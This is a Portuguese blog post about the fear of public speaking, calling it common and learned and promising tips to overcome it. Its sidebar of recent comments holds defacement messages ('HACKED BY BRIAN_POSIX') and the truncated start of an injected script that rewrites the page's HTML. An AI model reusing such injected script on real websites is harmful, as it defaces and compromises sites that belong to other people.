Claro! Quem é que não tem? Isto é absolutamente normal.

 

Algumas pesquisas revelaram que o medo de falar em público afecta cerca de 80% das pessoas, e que acompanhado do medo de fazer apresentações para grupos, costuma ser a principal fobia de gestores em início de carreira e mesmo de alguns mais experientes.

 

O medo de falar em público é um factor comum de stress para a maioria das pessoas, que por vezes chegam a fazer quase o impossível para evitar ficar nesta situação.

 

Muitas são as vezes em que temos de falar em público: reuniões, palestras, aulas, vendas… E o objectivo que se pretende atingir pode ser diverso, podemos querer motivar, vender uma ideia ou um projecto, marcar o nosso ponto de vista sobre algum assunto ou transmitir um conhecimento.

 

Sempre que se constrói uma carreira de sucesso a arte de falar em público está presente, e não tem de ser uma tarefa que provoque stress e pânico.

O medo de falar em público é adquirido, não nascemos com ele, muitas pessoas ultrapassam esse sentimento e tornam-se grandes oradores.

 

Se este “pequeno medo” é natural, então como fazer para vencer essa barreira?

Como cativar a audiência? Como comunicar com impacto e clareza?

É fundamental dominar as técnicas de falar em público! Portanto aprender como melhorar a capacidade de expressão (verbal e não-verbal), pode ser um diferencial na sua carreira.

 

Saiba ainda mais sobre este tema: conheça as causas e os sintomas, e confira connosco algumas dicas importantes.

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO